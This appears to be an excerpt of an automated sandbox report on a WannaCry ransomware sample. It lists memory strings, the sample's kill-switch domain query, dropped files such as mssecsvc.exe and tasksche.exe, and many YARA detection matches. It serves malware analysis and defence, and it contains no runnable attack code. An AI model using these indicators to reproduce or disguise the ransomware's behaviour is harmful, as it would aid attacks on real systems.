              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000015.00000003.321748674.0000018D75256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322257257.0000018D7523A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: mssecsvc.exe, 00000008.00000002.351072766.0000000000D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.kryptoslogic.com
              Source: unknown | DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC27A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle,4_2_00AC27A7
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Cache-Control: no-cache

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\tasksche.exe | Code function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!31_2_004014A6
              Source: Yara match | File source: y2jb4FtSNq.dll, type: SAMPLE
              Source: Yara match | File source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000004.00000000.263313016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000000.264700053.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000000.265661394.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000000.260276885.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.350893467.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000000.269555839.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000000.272462934.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000000.261708466.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000000.268279528.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000000.275761350.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6360, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6500, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6636, type: MEMORYSTR
              Source: Yara match | File source: C:\Windows\mssecsvc.exe, type: DROPPED

              System Summary

              Source: y2jb4FtSNq.dll, type: SAMPLE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: y2jb4FtSNq.dll, type: SAMPLE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 0000001F.00000000.342404801.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000008.00000000.272553493.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000004.00000000.261795649.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000008.00000000.268327554.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000004.00000000.260345828.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000004.00000000.264801473.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: 00000008.00000000.269636175.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPED | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\tasksche.exe, type: DROPPED | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPED | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: C:\Windows\mssecsvc.exe, type: DROPPED | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\mssecsvc.exe, type: DROPPED | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (based on rule by US CERT)
              Source: C:\Windows\mssecsvc.exe, type: DROPPED | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
              Source: C:\Windows\mssecsvc.exe, type: DROPPED | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
              Source: mssecsvc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: y2jb4FtSNq.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
